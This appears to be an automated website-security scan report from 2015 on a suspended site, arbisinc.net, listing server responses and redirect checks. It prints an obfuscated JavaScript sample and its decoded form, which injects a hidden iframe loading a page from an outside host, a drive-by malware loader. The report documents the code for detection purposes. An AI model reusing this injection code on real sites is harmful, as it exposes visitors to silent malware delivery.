Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arbisinc.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arbisinc.net/ | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 14:02:10 GMT Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi Server: nginx/1.6.2 Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://arbisinc.net/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 27187 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";
try{gserkewg();}catch(a){k=new Boolean().toString()};
var ar2="f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126 ...[1914 bytes skipped]...
Decoded script:
...[94579 bytes skipped]... os,1)
pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4
pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4
s+=ar.substr(pos,1)
s+=ar.substr(pos,1)
pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4
pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4
s+=ar.substr(pos,1)
s+=ar.substr(pos,1)
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://zamhuxnh.cz.cc/count28.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://zamhuxnh.cz.cc/count28.php');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
if (document.getElementsByTag ...[708 bytes skipped]...
Antivirus reports:
http://arbisinc.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 14:02:11 GMT Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi Server: nginx/1.6.2 Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arbisinc.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 08 Mar 2015 14:02:10 GMT
Location: http://arbisinc.net/cgi-sys/suspendedpage.cgi
Server: nginx/1.6.2
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
...291 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arbisinc.net
Referer: http://www.google.com/search?q=arbisinc.net
Result:
The result is similar to the first query. There are no suspicious redirects found.